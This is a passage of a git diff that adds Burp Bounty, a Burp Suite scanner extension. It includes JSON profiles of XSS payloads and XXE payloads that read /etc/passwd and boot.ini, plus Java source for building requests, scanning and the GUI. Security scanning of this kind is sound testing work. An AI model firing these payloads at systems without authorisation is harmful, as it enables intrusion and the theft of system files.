+[{"Name":"XSSHtmlUrlEncode","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003csvg \u003c/onload \u003d\"1\u003e (_\u003dalert,\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n_(1337)) \"\"\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":["HTML-encode all characters"],"UrlEncode":true,"CharsToUrlEncode":"\u0026;#","Grep":[],"Tags":["XSS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/html, application/json","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":4,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSSHtmlUrlEncode","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"XSS with payloads: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/XSSUrlEncode.bb b/profiles/XSSUrlEncode.bb
new file mode 100755
index 0000000..a7247dd
--- /dev/null
+++ b/profiles/XSSUrlEncode.bb
@@ -0,0 +1 @@
+[{"Name":"XSSUrlEncode","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":["URL-encode key characters"],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain, application/json","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":4,"RedirType":4,"MaxRedir":4,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSSUrlEncode","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"XSS with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/XXE.bb b/profiles/XXE.bb
new file mode 100755
index 0000000..64ccd4d
--- /dev/null
+++ b/profiles/XXE.bb
@@ -0,0 +1 @@
+[{"Name":"XXE","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e","\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ELEMENT foo ANY\u003e\u003c!ENTITY xxe SYSTEM \"file://c:/boot.ini\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e","\u003c!DOCTYPE foo [ \u003c!ENTITY % xxe SYSTEM \"data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk\"\u003e]\u003e\u003cfoo/\u003e","\u003c?xml version\u003d\"1.0\" encoding\u003d\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [\u003c!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource\u003d/etc/passwd\"\u003e]\u003e\u003cfoo\u003e\u0026xee;\u003c/foo\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x","boot loader","cm9vdD"],"Tags":["XXE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XXE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"XXE found with: \u003cbr\u003e \u003cpayload\u003e ","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/tags.txt b/profiles/tags.txt
new file mode 100755
index 0000000..2d459d4
--- /dev/null
+++ b/profiles/tags.txt
@@ -0,0 +1,19 @@
+Collaborator
+PathTraversal
+RCE
+SQLi
+CookieAttributes
+SecurityHeaders
+XSS
+JWT
+CMS
+CVE
+Errors
+InformationDisclosure
+API
+SQLi
+XXE
+endpoints
+regex
+Variations
+11paths
diff --git a/src/BuildUnencodeRequest.java b/src/BuildUnencodeRequest.java
new file mode 100644
index 0000000..ccc3163
--- /dev/null
+++ b/src/BuildUnencodeRequest.java
@@ -0,0 +1,70 @@
+package burpbounty;
+
+import burp.IExtensionHelpers;
+import burp.IScannerInsertionPoint;
+import java.util.List;
+import java.util.Random;
+
+public class BuildUnencodeRequest {
+
+ private Random random = new Random();
+ private IExtensionHelpers helpers;
+
+ BuildUnencodeRequest(IExtensionHelpers helpers) {
+ this.helpers = helpers;
+ }
+
+ byte[] buildUnencodedRequest(IScannerInsertionPoint iScannerInsertionPoint, byte[] payload, List headers) {
+ byte[] canary = buildCanary(payload.length);
+ byte[] request = iScannerInsertionPoint.buildRequest(canary);
+ int canaryPos = findCanary(canary, request);
+ System.arraycopy(payload, 0, request, canaryPos, payload.length);
+
+ String tempRequest = helpers.bytesToString(request);
+ String stringpayload = helpers.bytesToString(payload);
+
+ if (!headers.isEmpty()) {
+ for (int x = 0; x < headers.size(); x++) {
+ String replace = headers.get(x).replace;
+ if (headers.get(x).type.equals("Request")) {
+ if (headers.get(x).regex.equals("String")) {
+ if (replace.contains("{PAYLOAD}")) {
+ replace = replace.replace("{PAYLOAD}", stringpayload);
+ }
+ if (headers.get(x).match.isEmpty()) {
+ tempRequest = tempRequest.replace("\r\n\r\n", "\r\n" + replace + "\r\n\r\n");
+ } else {
+ tempRequest = tempRequest.replace(headers.get(x).match, replace);
+ }
+ } else {
+ if (replace.contains("{PAYLOAD}")) {
+ replace = replace.replaceAll("\\{PAYLOAD\\}", stringpayload);
+ }
+ if (headers.get(x).match.isEmpty()) {
+ tempRequest = tempRequest.replaceAll("\\r\\n\\r\\n", "\r\n" + replace + "\r\n\r\n");
+ } else {
+ tempRequest = tempRequest.replaceAll(headers.get(x).match, replace);
+ }
+ }
+
+ }
+ }
+ return helpers.stringToBytes(tempRequest);
+ }
+ return request;
+ }
+
+ private byte[] buildCanary(int payloadLength) {
+ byte[] canary = new byte[payloadLength];
+ for (int i = 0; i < payloadLength; i++) {
+ canary[i] = '$';
+ }
+ return canary;
+ }
+
+ private int findCanary(byte[] canary, byte[] request) {
+ int canaryPos = helpers.indexOf(request, canary, false, 0, request.length);
+ int canaryPos2 = helpers.indexOf(request, canary, false, canaryPos + 1, request.length);
+ return canaryPos;
+ }
+}
diff --git a/src/BurpBountyExtension.java b/src/BurpBountyExtension.java
new file mode 100644
index 0000000..e201d1d
--- /dev/null
+++ b/src/BurpBountyExtension.java
@@ -0,0 +1,207 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import burp.IBurpCollaboratorClientContext;
+import burp.IBurpExtender;
+import burp.IBurpExtenderCallbacks;
+import burp.IExtensionHelpers;
+import burp.IExtensionStateListener;
+import burp.IHttpRequestResponse;
+import burp.IRequestInfo;
+import burp.IScanIssue;
+import burp.IScannerCheck;
+import burp.IScannerInsertionPoint;
+import burp.IScannerInsertionPointProvider;
+import burp.ITab;
+import com.google.gson.JsonArray;
+import com.google.gson.JsonIOException;
+import com.google.gson.JsonParser;
+import com.google.gson.JsonSyntaxException;
+import com.google.gson.stream.JsonReader;
+import java.awt.Component;
+import java.io.File;
+import java.io.FileNotFoundException;
+import java.io.FileReader;
+import java.net.URL;
+import java.util.ArrayList;
+import java.util.List;
+import java.util.logging.Level;
+import java.util.logging.Logger;
+import javax.swing.JScrollPane;
+import javax.swing.ScrollPaneConstants;
+import javax.swing.SwingUtilities;
+
+public class BurpBountyExtension implements IBurpExtender, ITab, IScannerCheck, IExtensionStateListener, IScannerInsertionPointProvider {
+
+ public static IBurpExtenderCallbacks callbacks;
+ private IExtensionHelpers helpers;
+ List CollaboratorClientContext;
+ private JScrollPane optionsTab;
+ private BurpBountyGui panel;
+ Issue issue;
+ String filename;
+ BurpCollaboratorThread BurpCollaborator;
+ BurpCollaboratorThread bct;
+ CollaboratorData burpCollaboratorData;
+ List responses;
+ List params;
+
+ @Override
+ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
+ this.callbacks = callbacks;
+ this.helpers = callbacks.getHelpers();
+ callbacks.setExtensionName("Burp Bounty");
+ callbacks.registerScannerCheck(this);
+ callbacks.registerExtensionStateListener(this);
+ callbacks.registerScannerInsertionPointProvider(this);
+ CollaboratorClientContext = new ArrayList();
+ burpCollaboratorData = new CollaboratorData(helpers);
+ bct = new BurpCollaboratorThread(callbacks, burpCollaboratorData);
+ responses = new ArrayList();
+ params = new ArrayList();
+ filename = "";
+
+ SwingUtilities.invokeLater(() -> {
+ panel = new BurpBountyGui(this);
+ optionsTab = new JScrollPane(panel, ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED, ScrollPaneConstants.HORIZONTAL_SCROLLBAR_AS_NEEDED);
+ callbacks.addSuiteTab(this);
+
+ callbacks.printOutput("- Burp Bounty v3.1");
+ callbacks.printOutput("- For bugs please on the official github: https://github.com/wagiro/BurpBounty/");
+ callbacks.printOutput("- Created by Eduardo Garcia Melia ");
+ bct.start();
+
+ });
+
+ }
+
+ @Override
+ public void extensionUnloaded() {
+ bct.doStop();
+ callbacks.printOutput("- Burp Bounty extension was unloaded");
+ }
+
+ @Override
+ public List getInsertionPoints(IHttpRequestResponse baseRequestResponse) {
+ List insertionPoints = new ArrayList();
+ IRequestInfo request = helpers.analyzeRequest(baseRequestResponse);
+
+ if (request.getMethod().equals("GET")) {
+ String url = request.getUrl().getHost();
+ byte[] match = helpers.stringToBytes("/");
+ byte[] req = baseRequestResponse.getRequest();
+ int len = helpers.bytesToString(baseRequestResponse.getRequest()).indexOf("HTTP");
+ int beginAt = 0;
+
+ while (beginAt < len) {
+ beginAt = helpers.indexOf(req, match, false, beginAt, len);
+ if (beginAt == -1) {
+ break;
+ }
+ if(!params.contains(url+":p4r4m" + beginAt)){
+ insertionPoints.add(helpers.makeScannerInsertionPoint("p4r4m" + beginAt, baseRequestResponse.getRequest(), beginAt, helpers.bytesToString(baseRequestResponse.getRequest()).indexOf(" HTTP")));
+ params.add(url+":p4r4m" + beginAt);
+ }
+ beginAt += match.length;
+ }
+ }
+ return insertionPoints;
+ }
+
+ @Override
+ public List doActiveScan(IHttpRequestResponse baseRequestResponse, IScannerInsertionPoint insertionPoint) {
+ JsonArray data = new JsonArray();
+ filename = panel.getFilename();
+ FileReader fr;
+ params = new ArrayList();
+
+ try {
+ File f = new File(filename);
+ if (f.exists() && f.isDirectory()) {
+ for (File file : f.listFiles()) {
+ if (file.getName().endsWith("bb")) {
+ fr = new FileReader(file.getAbsolutePath());
+ JsonReader json = new JsonReader(fr);
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+ }
+ }
+ }
+ } catch (JsonIOException | JsonSyntaxException | FileNotFoundException e) {
+ System.out.println(e.getClass());
+ }
+
+ GenericScan as = new GenericScan(callbacks, data, burpCollaboratorData);
+ try {
+ return as.runAScan(baseRequestResponse, insertionPoint);
+ } catch (Exception ex) {
+ Logger.getLogger(BurpBountyExtension.class.getName()).log(Level.SEVERE, null, ex);
+ }
+ return null;
+ }
+
+ @Override
+ public List doPassiveScan(IHttpRequestResponse baseRequestResponse) {
+
+ JsonArray data = new JsonArray();
+ filename = panel.getFilename();
+ FileReader fr;
+
+ try {
+ File f = new File(filename);
+ if (f.exists() && f.isDirectory()) {
+ for (File file : f.listFiles()) {
+ if (file.getName().endsWith("bb")) {
+ fr = new FileReader(file.getAbsolutePath());
+ JsonReader json = new JsonReader(fr);
+ JsonParser parser = new JsonParser();
+ data.addAll(parser.parse(json).getAsJsonArray());
+ }
+ }
+ }
+ } catch (JsonIOException | JsonSyntaxException | FileNotFoundException e) {
+ System.out.println(e.getClass());
+ }
+
+ GenericScan ps = new GenericScan(callbacks, data, burpCollaboratorData);
+ try {
+ return ps.runPScan(baseRequestResponse);
+ } catch (Exception ex) {
+ Logger.getLogger(BurpBountyExtension.class.getName()).log(Level.SEVERE, null, ex);
+ }
+ return null;
+ }
+
+ @Override
+ public int consolidateDuplicateIssues(IScanIssue existingIssue, IScanIssue newIssue) {
+ if (existingIssue.getIssueName().equals(newIssue.getIssueName())) {
+ return -1;
+ } else {
+ return 0;
+ }
+ }
+
+ @Override
+ public String getTabCaption() {
+ return "Burp Bounty";
+ }
+
+ @Override
+ public Component getUiComponent() {
+ return optionsTab;
+ }
+}
diff --git a/src/BurpBountyGui.form b/src/BurpBountyGui.form
new file mode 100644
index 0000000..1d16362
--- /dev/null
+++ b/src/BurpBountyGui.form
@@ -0,0 +1,2872 @@
+
+
+
diff --git a/src/BurpBountyGui.java b/src/BurpBountyGui.java
new file mode 100644
index 0000000..bbe2615
--- /dev/null
+++ b/src/BurpBountyGui.java
@@ -0,0 +1,4653 @@
+/*
+Copyright 2018 Eduardo Garcia Melia
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+ */
+package burpbounty;
+
+import burp.IBurpExtenderCallbacks;
+import com.google.gson.Gson;
+import com.google.gson.JsonArray;
+import com.google.gson.JsonElement;
+import com.google.gson.JsonObject;
+import com.google.gson.JsonParser;
+import com.google.gson.reflect.TypeToken;
+import com.google.gson.stream.JsonReader;
+import java.awt.Desktop;
+import java.awt.Toolkit;
+import java.awt.datatransfer.Clipboard;
+import java.awt.datatransfer.DataFlavor;
+import java.awt.datatransfer.Transferable;
+import java.awt.datatransfer.UnsupportedFlavorException;
+import java.io.BufferedReader;
+import java.io.BufferedWriter;
+import java.io.File;
+import java.io.FileNotFoundException;
+import java.io.FileOutputStream;
+import java.io.FileReader;
+import java.io.FileWriter;
+import java.io.FilenameFilter;
+import java.io.IOException;
+import java.io.OutputStreamWriter;
+import java.io.PrintWriter;
+import java.net.URI;
+import java.net.URISyntaxException;
+import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.List;
+import java.util.Set;
+import java.util.TreeSet;
+import java.util.logging.Level;
+import java.util.logging.Logger;
+import javax.swing.DefaultCellEditor;
+import javax.swing.DefaultListModel;
+import javax.swing.JComboBox;
+import javax.swing.JFileChooser;
+import javax.swing.JFrame;
+import javax.swing.JOptionPane;
+import javax.swing.JTable;
+import javax.swing.RowSorter;
+import javax.swing.SortOrder;
+import javax.swing.table.DefaultTableModel;
+import javax.swing.table.TableModel;
+import javax.swing.table.TableRowSorter;
+
+public class BurpBountyGui extends javax.swing.JPanel {
+
+ private IBurpExtenderCallbacks callbacks;
+ private String filename;
+ private String name;
+ private String issuename;
+ private String issuedetail;
+ private String issuebackground;
+ private String remediationdetail;
+ private String remediationbackground;
+ private String charstourlencode;
+ private int scanner;
+ private int matchtype;
+ private String issueseverity;
+ private String issueconfidence;
+ private String responsecode;
+ private String contenttype;
+ private boolean negativect;
+ private boolean negativerc;
+ private boolean notresponse;
+ private boolean casesensitive;
+ private boolean excludeHTTP;
+ private boolean onlyHTTP;
+ private boolean urlencode;
+ private boolean isresponsecode;
+ private boolean iscontenttype;
+ private int redirtype;
+ private int maxRedir;
+ private int payloadPosition;
+ private String payloadsfile;
+ private String grepsfile;
+ private String timeOut;
+ private String contentLength;
+ private String Author;
+ private DefaultListModel payload;
+ private DefaultListModel grep;
+ private DefaultListModel encoder;
+ private DefaultListModel tag;
+ private DefaultListModel tagmanager;
+ private List Header;
+ private List variationAttributes;
+ private List insertionPointType;
+
+ DefaultTableModel model;
+ DefaultTableModel model1;
+ DefaultTableModel model2;
+ DefaultTableModel model4;
+
+ public BurpBountyGui(BurpBountyExtension parent) {
+ this.callbacks = parent.callbacks;
+ filename = "";
+ name = "";
+ issuename = "";
+ issuedetail = "";
+ issuebackground = "";
+ remediationdetail = "";
+ remediationbackground = "";
+ charstourlencode = "";
+ scanner = 0;
+ matchtype = 0;
+ issueseverity = "";
+ issueconfidence = "";
+ responsecode = "";
+ contenttype = "";
+ negativect = false;
+ negativerc = false;
+ notresponse = false;
+ casesensitive = false;
+ excludeHTTP = false;
+ onlyHTTP = false;
+ urlencode = false;
+ isresponsecode = false;
+ iscontenttype = false;
+ redirtype = 0;
+ maxRedir = 0;
+ payloadPosition = 0;
+ payloadsfile = "";
+ grepsfile = "";
+ timeOut = "";
+ contentLength = "";
+ Author = "";
+ payload = new DefaultListModel();
+ grep = new DefaultListModel();
+ encoder = new DefaultListModel();
+ tag = new DefaultListModel();
+ tagmanager = new DefaultListModel();
+ model4 = new DefaultTableModel();
+ Header = new ArrayList();
+ variationAttributes = new ArrayList();
+ insertionPointType = new ArrayList();
+
+ if (callbacks.loadExtensionSetting("filename") != null) {
+ filename = callbacks.loadExtensionSetting("filename");
+ } else {
+ filename = System.getProperty("user.dir") + "/";
+ }
+ model = new DefaultTableModel() {
+
+ @Override
+ public boolean isCellEditable(int row, int column) {
+ //all cells false
+ return false;
+ }
+ };
+
+ model1 = new DefaultTableModel() {
+
+ @Override
+ public boolean isCellEditable(int row, int column) {
+ //all cells false
+ return false;
+ }
+ };
+
+ model2 = new DefaultTableModel() {
+
+ @Override
+ public boolean isCellEditable(int row, int column) {
+ //all cells false
+ return false;
+ }
+ };
+
+ //main
+ initComponents();
+ initCombo();
+ text11.setText(filename);
+ makeTagsFile();
+ showProfiles("All");
+ showHeaders(Header);
+ }
+
+ public void clear() {
+ text1.setText("");
+ grep.removeAllElements();
+ payload.removeAllElements();
+ encoder.removeAllElements();
+ tag.removeAllElements();
+ text71.setText("");
+ text72.setText("");
+ check8.setSelected(false);
+ text5.setText("");
+ buttonGroup1.clearSelection();
+ buttonGroup4.clearSelection();
+ buttonGroup2.clearSelection();
+ buttonGroup3.clearSelection();
+ buttonGroup5.clearSelection();
+ buttonGroup8.clearSelection();
+ buttonGroup9.clearSelection();
+ check1.setSelected(false);
+ check4.setSelected(false);
+ check71.setSelected(false);
+ check72.setSelected(false);
+ excludehttp.setSelected(false);
+ onlyhttp.setSelected(false);
+ negativeCT.setSelected(false);
+ negativeRC.setSelected(false);
+ text4.setText("");
+ textarea1.setText("");
+ textarea2.setText("");
+ textarea3.setText("");
+ textarea4.setText("");
+ sp1.setValue(0);
+ textpayloads.setText("");
+ textgreps.setText("");
+ texttime.setText("");
+ textauthor.setText("");
+ textcl.setText("");
+ setSelectedVariations(false);
+ setSelectedInsertionPointType(false);
+
+ }
+
+ public void setAttackValues(String issue) {
+ //Set Attack values when select from main combobox
+ try {
+ Gson gson = new Gson();
+ JsonArray json = initJson();
+ Issue i = new Issue();
+
+ if (json != null) {
+ for (JsonElement pa : json) {
+ JsonObject bbObj = pa.getAsJsonObject();
+ if (bbObj.get("Name").getAsString().equals(issue)) {
+ i = gson.fromJson(bbObj.toString(), Issue.class);
+ }
+
+ }
+ }
+
+ variationAttributes.clear();
+ insertionPointType.clear();
+ name = i.getName();
+ scanner = i.getScanner();
+ casesensitive = i.getCaseSensitive();
+ notresponse = i.getNotResponse();
+ matchtype = i.getMatchType();
+ issuename = i.getIssueName();
+ issueseverity = i.getIssueSeverity();
+ issueconfidence = i.getIssueConfidence();
+ issuedetail = i.getIssueDetail();
+ issuebackground = i.getIssueBackground();
+ remediationdetail = i.getRemediationDetail();
+ remediationbackground = i.getRemediationBackground();
+ urlencode = i.getUrlEncode();
+ charstourlencode = i.getCharsToUrlEncode();
+ iscontenttype = i.getIsContentType();
+ isresponsecode = i.getIsResponseCode();
+ contenttype = i.getContentType();
+ responsecode = i.getResponseCode();
+ excludeHTTP = i.getExcludeHTTP();
+ onlyHTTP = i.getOnlyHTTP();
+ negativect = i.getNegativeCT();
+ negativerc = i.getNegativeRC();
+ redirtype = i.getRedirection();
+ maxRedir = i.getMaxRedir();
+ payloadsfile = i.getpayloadsFile();
+ grepsfile = i.getgrepsFile();
+ payloadPosition = i.getPayloadPosition();
+ timeOut = i.getTime();
+ Author = i.getAuthor();
+ contentLength = i.getContentLength();
+ Header = i.getHeader();
+ variationAttributes = i.getVariationAttributes();
+ insertionPointType = i.getInsertionPointType();
+
+ if (payloadsfile == null) {
+ payloadsfile = "";
+ }
+ if (grepsfile == null) {
+ grepsfile = "";
+ }
+ if (Author == null) {
+ Author = "";
+ }
+ if (contentLength == null) {
+ contentLength = "";
+ }
+ if (name == null) {
+ name = "";
+ }
+ if (issuename == null) {
+ issuename = "";
+ }
+ if (issuedetail == null) {
+ issuedetail = "";
+ }
+ if (issuebackground == null) {
+ issuebackground = "";
+ }
+ if (remediationdetail == null) {
+ remediationdetail = "";
+ }
+ if (remediationbackground == null) {
+ remediationbackground = "";
+ }
+ if (charstourlencode == null) {
+ charstourlencode = "";
+ }
+ if (issueseverity == null) {
+ issueseverity = "";
+ }
+ if (issueconfidence == null) {
+ issueconfidence = "";
+ }
+ if (responsecode == null) {
+ responsecode = "";
+ }
+ if (contenttype == null) {
+ contenttype = "";
+ }
+ if (timeOut == null) {
+ timeOut = "";
+ }
+ if (Header == null) {
+ Header = new ArrayList();
+ }
+ if (variationAttributes == null) {
+ variationAttributes = new ArrayList();
+ }
+ if (insertionPointType == null) {
+ insertionPointType = new ArrayList();
+ }
+
+ if (Author.length() >= 35) {
+ textauthor.setText(Author.substring(0, 34));
+ } else {
+ textauthor.setText(Author);
+ }
+
+ if (name.length() >= 35) {
+ text1.setText(name.substring(0, 34));
+ } else {
+ text1.setText(name);
+ }
+
+ if (scanner == 1) {
+ buttonGroup1.setSelected(radio1.getModel(), true);
+ } else if (scanner == 2) {
+ buttonGroup1.setSelected(radio2.getModel(), true);
+ } else if (scanner == 3) {
+ buttonGroup1.setSelected(radioPR.getModel(), true);
+ }
+
+ if (payloadPosition == 1) {
+ buttonGroup9.setSelected(replace.getModel(), true);
+ } else if (payloadPosition == 2) {
+ buttonGroup9.setSelected(append.getModel(), true);
+ }
+
+ grep.removeAllElements();
+ payload.removeAllElements();
+ encoder.removeAllElements();
+ tag.removeAllElements();
+ textpayloads.setText(payloadsfile);
+ textgreps.setText(grepsfile);
+
+ if (!grepsfile.isEmpty()) {
+ loadPath(grepsfile, grep);
+ updateGreps(grepsfile, i);
+
+ } else {
+ for (String gs : i.getGreps()) {
+ grep.addElement(gs);
+ }
+ }
+
+ if (!payloadsfile.isEmpty()) {
+ loadPath(payloadsfile, payload);
+ updatePayloads(payloadsfile, i);
+
+ } else {
+ for (String pay : i.getPayloads()) {
+ payload.addElement(pay);
+ }
+ }
+
+ if (i.getTags() != null) {
+ for (String t : i.getTags()) {
+ tag.addElement(t);
+ }
+ }
+
+ for (String enc : i.getEncoder()) {
+ encoder.addElement(enc);
+ }
+
+ text71.setText(contenttype);
+ text72.setText(responsecode);
+
+ check8.setSelected(urlencode);
+ text5.setText(charstourlencode);
+ excludehttp.setSelected(excludeHTTP);
+ onlyhttp.setSelected(onlyHTTP);
+ if (timeOut.equals("0")) {
+ texttime.setText("");
+ } else {
+ texttime.setText(timeOut);
+ }
+
+ if (contentLength.equals("0")) {
+ textcl.setText("");
+ } else {
+ textcl.setText(contentLength);
+ }
+
+ switch (matchtype) {
+ case 1:
+ buttonGroup4.setSelected(radio4.getModel(), true);
+ break;
+ case 2:
+ buttonGroup4.setSelected(radio3.getModel(), true);
+ break;
+ case 3:
+ buttonGroup4.setSelected(radio12.getModel(), true);
+ break;
+ case 4:
+ buttonGroup4.setSelected(radio22.getModel(), true);
+ break;
+ case 5:
+ buttonGroup4.setSelected(radiotime.getModel(), true);
+ break;
+ case 6:
+ buttonGroup4.setSelected(radiocl.getModel(), true);
+ break;
+ case 7:
+ buttonGroup4.setSelected(variationsRadio.getModel(), true);
+ break;
+ case 8:
+ buttonGroup4.setSelected(invariationsRadio.getModel(), true);
+ break;
+ default:
+ buttonGroup4.clearSelection();
+ break;
+ }
+
+ switch (redirtype) {
+ case 1:
+ buttonGroup8.setSelected(rb1.getModel(), true);
+ break;
+ case 2:
+ buttonGroup8.setSelected(rb2.getModel(), true);
+ break;
+ case 3:
+ buttonGroup8.setSelected(rb3.getModel(), true);
+ break;
+ case 4:
+ buttonGroup8.setSelected(rb4.getModel(), true);
+ break;
+ default:
+ buttonGroup8.clearSelection();
+ break;
+ }
+
+ showHeaders(Header);
+ setSelectedVariations(false);
+
+ if (variationAttributes.contains("status_code")) {
+ status_code.setSelected(true);
+ }
+ if (variationAttributes.contains("input_image_labels")) {
+ input_image_labels.setSelected(true);
+ }
+ if (variationAttributes.contains("non_hidden_form_input_types")) {
+ non_hidden_form_input_types.setSelected(true);
+ }
+ if (variationAttributes.contains("page_title")) {
+ page_title.setSelected(true);
+ }
+ if (variationAttributes.contains("visible_text")) {
+ visible_text.setSelected(true);
+ }
+ if (variationAttributes.contains("button_submit_labels")) {
+ button_submit_labels.setSelected(true);
+ }
+ if (variationAttributes.contains("div_ids")) {
+ div_ids.setSelected(true);
+ }
+ if (variationAttributes.contains("word_count")) {
+ word_count.setSelected(true);
+ }
+ if (variationAttributes.contains("content_type")) {
+ content_type.setSelected(true);
+ }
+ if (variationAttributes.contains("outbound_edge_tag_names")) {
+ outbound_edge_tag_names.setSelected(true);
+ }
+ if (variationAttributes.contains("whole_body_content")) {
+ whole_body_content.setSelected(true);
+ }
+ if (variationAttributes.contains("etag_header")) {
+ etag_header.setSelected(true);
+ }
+ if (variationAttributes.contains("visible_word_count")) {
+ visible_word_count.setSelected(true);
+ }
+ if (variationAttributes.contains("content_length")) {
+ content_length.setSelected(true);
+ }
+ if (variationAttributes.contains("header_tags")) {
+ header_tags.setSelected(true);
+ }
+ if (variationAttributes.contains("tag_ids")) {
+ tag_ids.setSelected(true);
+ }
+ if (variationAttributes.contains("comments")) {
+ comments.setSelected(true);
+ }
+ if (variationAttributes.contains("line_count")) {
+ line_count.setSelected(true);
+ }
+ if (variationAttributes.contains("set_cookie_names")) {
+ set_cookie_names.setSelected(true);
+ }
+ if (variationAttributes.contains("last_modified_header")) {
+ last_modified_header.setSelected(true);
+ }
+ if (variationAttributes.contains("first_header_tag")) {
+ first_header_tag.setSelected(true);
+ }
+ if (variationAttributes.contains("tag_names")) {
+ tag_names.setSelected(true);
+ }
+ if (variationAttributes.contains("input_submit_labels")) {
+ input_submit_labels.setSelected(true);
+ }
+ if (variationAttributes.contains("outbound_edge_count")) {
